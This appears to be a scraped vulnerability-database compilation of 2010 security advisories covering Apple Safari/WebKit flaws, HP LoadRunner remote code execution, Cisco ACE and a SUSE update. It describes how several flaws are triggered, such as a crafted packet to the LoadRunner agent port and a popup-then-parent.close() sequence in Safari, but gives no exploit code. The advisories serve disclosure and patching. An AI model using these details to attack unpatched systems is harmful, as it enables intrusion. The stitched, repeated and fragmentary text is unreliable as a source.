40750 WebKit HTTPS Redirect Information Disclosure Vulnerability
40752 WebKit HTTP URI Clipboard Information Disclosure Vulnerability
40753 WebKit Local Storage and Web SQL Database Directory Traversal Vulnerability
40754 WebKit 'execCommand()' Function Clipboard Overwrite Security Weakness
40756 WebKit ':visited' CSS Pseudo-class Information Disclosure Vulnerability. ----------------------------------------------------------------------
Secunia CSI integrated with Microsoft WSUS and Microsoft SCCM for 3rd party Patch Management
Free webinars
http://secunia.com/vulnerability_scanning/corporate/webinars/
----------------------------------------------------------------------
TITLE:
Apple Safari Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA40105
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/40105/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=40105
RELEASE DATE:
2010-06-09
DISCUSS ADVISORY:
http://secunia.com/advisories/40105/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/40105/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=40105
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Apple Safari, which can be
exploited by malicious people to bypass certain security restrictions,
disclose sensitive information, conduct spoofing or cross-site
scripting attacks, and potentially compromise a user's system.
1) An error when processing ColorSync profiles embedded in a
specially crafted image can be exploited to potentially execute
arbitrary code.
This is related to vulnerability #2 in:
SA36096
2) The browser follows links containing arbitrary user information
without warning, which can be exploited to facilitate phishing
attacks via specially crafted URLs.
4) An error in WebKit when handling clipboard URLs can be exploited
to disclose sensitive files if a user is tricked into dragging or
pasting links or images to a malicious website.
5) An error in WebKit when a selection from a website is dragged or
pasted into another website can be exploited to potentially execute
arbitrary JavaScript code in the context of the destination website.
6) An error in WebKit when handling UTF-7 encoded text can be
exploited to leave an HTML quoted string unterminated and facilitate
cross-site scripting attacks.
7) An input sanitation error in WebKit when handling Local Storage
and Web SQL databases can be exploited to create database files in
arbitrary directories via directory traversal attacks.
8) A use-after-free error in WebKit when rendering HTML buttons can
be exploited to potentially execute arbitrary code.
10) An error in WebKit when handling HTML document fragments can be
exploited to execute arbitrary JavaScript code in a legitimate
context processing foreign HTML fragments.
11) An error in WebKit when handling keyboard focus can be exploited
to deliver key press events intended for a different frame.
12) An error in WebKit when handling DOM constructor objects can be
exploited to conduct cross-site scripting attacks.
13) A use-after-free error in WebKit when handling the removal of
container elements can be exploited to potentially execute arbitrary
code.
14) A use-after-free error in WebKit when rendering a selection at
the time of a layout change can be exploited to potentially execute
arbitrary code.
15) An error in WebKit when handling ordered list insertions can be
exploited to corrupt memory and potentially execute arbitrary code.
16) An uninitialised memory access error in WebKit when handling
selection changes on form input elements can be exploited to
potentially execute arbitrary code.
18) A use-after-free error in WebKit when handling the
":first-letter" pseudo-element in cascading stylesheets can be
exploited to potentially execute arbitrary code.
19) A double-free error in WebKit when handling event listeners in
SVG documents can be exploited to potentially execute arbitrary
code.
21) A use-after-free error in WebKit when handling SVG documents with
multiple "use" elements can be exploited to potentially execute
arbitrary code.
22) An error in WebKit when handling nested "use" elements in SVG
documents can be exploited to corrupt memory and potentially execute
arbitrary code.
23) A use-after-free error in WebKit when handling CSS run-ins can be
exploited to potentially execute arbitrary code.
24) A use-after-free error in WebKit when handling HTML elements with
custom vertical positioning can be exploited to potentially execute
arbitrary code.
25) An error exists in WebKit when visiting HTTPS websites
redirecting to HTTP websites. This can be exploited to disclose
potentially sensitive information contained in the HTTPS URL by
reading the "Referer" header.
26) An integer truncation error in WebKit when handling TCP requests
can be exploited to pass arbitrary data to arbitrary TCP ports.
27) An error in WebKit when processing connections to IRC ports can
be exploited to send arbitrary data to arbitrary IRC servers.
29) An error in WebKit can be exploited to read NTLM credentials that
are incorrectly transmitted in plain-text via Man-in-the-Middle (MitM)
attacks.
32) An error in WebKit when handling a canvas with an SVG image
pattern can be exploited to load and capture an image from another
website.
33) An error in WebKit when rendering CSS-styled HTML content with
multiple ":after" pseudo-selectors can be exploited to corrupt memory
and potentially execute arbitrary code.
34) An error in WebKit when handling the "src" attribute of a frame
element can be exploited to facilitate cross-site scripting attacks.
36) An error in the implementation of the JavaScript "execCommand"
function can be exploited to modify the contents of the clipboard.
40) A use-after-free error in WebKit when rendering HTML document
subtrees can be exploited to potentially execute arbitrary code.
41) An error in WebKit when handling HTML content in "textarea"
elements can be exploited to conduct cross-site scripting attacks.
42) An error in WebKit when visiting a website which redirects form
submissions to a redirecting website can be exploited disclose
submitted data.
43) A type checking error in WebKit when handling text nodes can be
exploited to potentially execute arbitrary code.
45) An error in WebKit when handling HTML tables can be exploited to
trigger an out-of-bounds memory access and potentially execute
arbitrary code.
46) An error in WebKit when handling the CSS ":visited" pseudo-class
can be exploited to disclose visited websites.
SOLUTION:
Update to version 4.1 (available only for Mac OS X v10.4 systems) or
upgrade to version 5.0.
PROVIDED AND/OR DISCOVERED BY:
37) Michal Zalewski
The vendor also credits:
1) Chris Evans of the Google Security Team, and Andrzej Dyjak
2) Abhishek Arya of Google
3) Borja Marcos of Sarenet
4) Eric Seidel of Google
5) Paul Stone of Context Information Security
6) Masahiro Yamada
8) Matthieu Bonetti of Vupen
9) Ralf Philipp Weinmann working with TippingPoint's Zero Day
Initiative
10, 41) Eduardo Vela Nava (sirdarckcat) of Google
11) Michal Zalewski of Google
12) Gianni "gf3" Chiappetta of Runlevel6
13, 15, 16, 18, 19, 20, 21, 23, 43) wushi of team509, working with
TippingPoint's Zero Day Initiative
14) wushi and Z of team509, working with TippingPoint's Zero Day
Initiative
17) regenrecht working with iDefense
22, 31) Aki Helin of OUSPG
24) Ojan Vafai of Google
25) Colin Percival of Tarsnap
28) Dave Bowker
30) Mark Dowd of Azimuth Security
32) Chris Evans of Google
33, 45) wushi of team509
34) Sergey Glazunov
35) kuzzcc, and Skylined of Google Chrome Security Team
38) Yaar Schnitman of Google
39) Mark Dowd
40) James Robinson of Google
42) Marc Worrell of WhatWebWhat
ORIGINAL ADVISORY:
Apple:
http://support.apple.com/kb/HT4196
Michal Zalewski:
http://lcamtuf.blogspot.com/2010/06/safari-tale-of-betrayal-and-revenge.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0179 | CVE-2010-1940 | Apple Safari Vulnerability in obtaining important information in |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Apple Safari 4.0.5 on Windows sends the "Authorization: Basic" header appropriate for one web site to a different web site named in a Location header received from the first site, which allows remote web servers to obtain sensitive information by logging HTTP requests. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
http://secunia.com/company/jobs/
----------------------------------------------------------------------
TITLE:
Apple Safari "parent.close()" Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA39670
VERIFY ADVISORY:
http://secunia.com/advisories/39670/
DESCRIPTION:
A vulnerability has been discovered in Apple Safari, which can be
exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the handling of parent
windows and can result in a function call using an invalid pointer.
This can be exploited to execute arbitrary code when a user e.g.
visits a specially crafted web page and closes opened pop-up
windows.
The vulnerability is confirmed in Safari version 4.0.5 for Windows.
Other versions may also be affected.
SOLUTION:
Do not visit untrusted web sites or follow links from untrusted
sources.
PROVIDED AND/OR DISCOVERED BY:
Krystian Kloskowski (h07)
ORIGINAL ADVISORY:
http://h07.w.interia.pl/Safari.rar
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0624 | No CVE | Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness |
CVSS V2: - CVSS V3: - Severity: - |
Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.
Attackers can exploit this issue to avoid having client IP addresses logged by servers.
| VAR-201005-0178 | CVE-2010-1939 | Apple Safari window object invalid pointer vulnerability |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Use-after-free vulnerability in Apple Safari 4.0.5 on Windows allows remote attackers to execute arbitrary code by using window.open to create a popup window for a crafted HTML document, and then calling the parent window's close method, which triggers improper handling of a deleted window object. Apple Safari Is window A vulnerability exists that does not correctly handle references to objects. Apple Safari Then window With a reference to the object remaining, window It is possible to delete objects. JavaScript Removed from window An illegal pointer reference occurs when using an object.
Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.
NOTE: To successfully exploit this issue, the browser pop-up blocker needs to be disabled. The pop-up blocker in Safari is enabled by default. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
The vulnerability is caused due to an error in the handling of parent
windows and can result in a function call using an invalid pointer.
This can be exploited to execute arbitrary code when a user e.g.
visits a specially crafted web page and closes opened pop-up
windows.
Other versions may also be affected.
SOLUTION:
Do not visit untrusted web sites or follow links from untrusted
sources.
PROVIDED AND/OR DISCOVERED BY:
Krystian Kloskowski (h07)
ORIGINAL ADVISORY:
http://h07.w.interia.pl/Safari.rar
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0161 | CVE-2010-1549 | HP LoadRunner Vulnerability in arbitrary code execution in agents such as |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Agent in HP LoadRunner before 9.50 and HP Performance Center before 9.50 allows remote attackers to execute arbitrary code via unknown vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the process magentproc.exe that binds to TCP port 54345. A specially crafted packet will allow unauthenticated users to execute local commands. When a state of 0 or 4 is passed after the parameters, mchan.dll will process the commands on the host. This allows for remote code execution under the context of the SYSTEM user. Successful exploits will result in the complete compromise of affected computers.
HP LoadRunner Agent 9.50 is vulnerable; other versions may also be affected. See the 'Configuration' chapter, 'Recommended Configuration' section. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
PROVIDED AND/OR DISCOVERED BY:
Tenable Network Security, reported via ZDI.
ORIGINAL ADVISORY:
HP (HPSBMA02201 SSRT071328):
https://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00912968
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-080/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-080: HP Mercury LoadRunner Agent Trusted Input Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-080
May 6, 2010
-- CVE ID:
CVE-2010-1549
-- Affected Vendors:
Hewlett-Packard
-- Affected Products:
Hewlett-Packard LoadRunner
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5356. Authentication is not
required to exploit this vulnerability.
-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00912968
-- Disclosure Timeline:
2007-03-19 - Vulnerability reported to vendor
2010-05-06 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Tenable Network Security
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00912968
Version: 1
HPSBMA02201 SSRT071328 rev.1 - HP LoadRunner Agent on Windows, Remote Unauthenticated Arbitrary Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
References: ZDI-CAN-177, CVE-2010-1549
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP LoadRunner Agent running on Windows, supplied with LoadRunner prior to v9.50
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-1549 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
Acknowledgement: The Hewlett-Packard Company thanks Tenable Network Security along with TippingPoints Zero Day Initiative for reporting this vulnerability to security-alert@hp.com.
RESOLUTION
The vulnerability can be resolved by enabling the Secure Channel feature. This resolution requires installation of LoadRunner v9.50 or subsequent.
Note: Starting with version 9.50 LoadRunner has provided a documented feature called Secure Channel. Secure Channel prevents non-trusted sources from transmitting code to the Load Generators by establishing an encrypted and secured communication channel. Secure Channel is disabled by default.
There are detailed instructions regarding Secure Channel in the HP LoadRunner Controller User's Guide. See the chapter 'Secure Host Communication'. The chapter sections 'Local Security Configuration' and 'Remote Security Configuration' have instructions to enforce secure communication using the Secure Channel feature. Using Secure Channel involves both enabling the Secure Channel feature and setting the security key.
PRODUCT SPECIFIC INFORMATION
None
HISTORY:
Version: 1 (rev.1) - 5 May 2010 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkvhiXEACgkQ4B86/C0qfVn76gCg2J9vEFjKUEvVD+XjIijUC7ZA
PkoAn1C32Dv2yF25fzW5f37FZr2xGMo3
=1gzO
-----END PGP SIGNATURE-----
| VAR-201005-0394 | CVE-2010-1729 | Apple Safari of WebKit Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
WebKit.dll in WebKit, as used in Safari.exe 4.531.9.1 in Apple Safari, allows remote attackers to cause a denial of service (application crash) via JavaScript that writes <marquee> sequences in an infinite loop. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. In the WebKit used by the Safari.exe program of Apple Safari, there is a resource management error vulnerability in WebKit.dll. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
SUSE update for Multiple Packages
SECUNIA ADVISORY ID:
SA43068
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43068/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43068
RELEASE DATE:
2011-01-25
DISCUSS ADVISORY:
http://secunia.com/advisories/43068/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43068/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43068
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
SUSE has issued an update for multiple packages, which fixes multiple
vulnerabilities.
For more information:
SA32349
SA33495
SA35095
SA35379
SA35411
SA35449
SA35758
SA36269
SA36677
SA37273
SA37346
SA37769
SA38061
SA38545
SA38932
SA39029
SA39091
SA39384
SA39661
SA39937
SA40002
SA40072
SA40105
SA40112
SA40148
SA40196
SA40257
SA40664
SA40783
SA41014
SA41085
SA41242
SA41328
SA41390
SA41443
SA41535
SA41841
SA41888
SA41968
SA42151
SA42264
SA42290
SA42312
SA42443
SA42461
SA42658
SA42769
SA42886
SA42956
SA43053
SOLUTION:
Apply updated packages via YaST Online Update or the SUSE FTP server.
ORIGINAL ADVISORY:
SUSE-SR:2011:002:
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------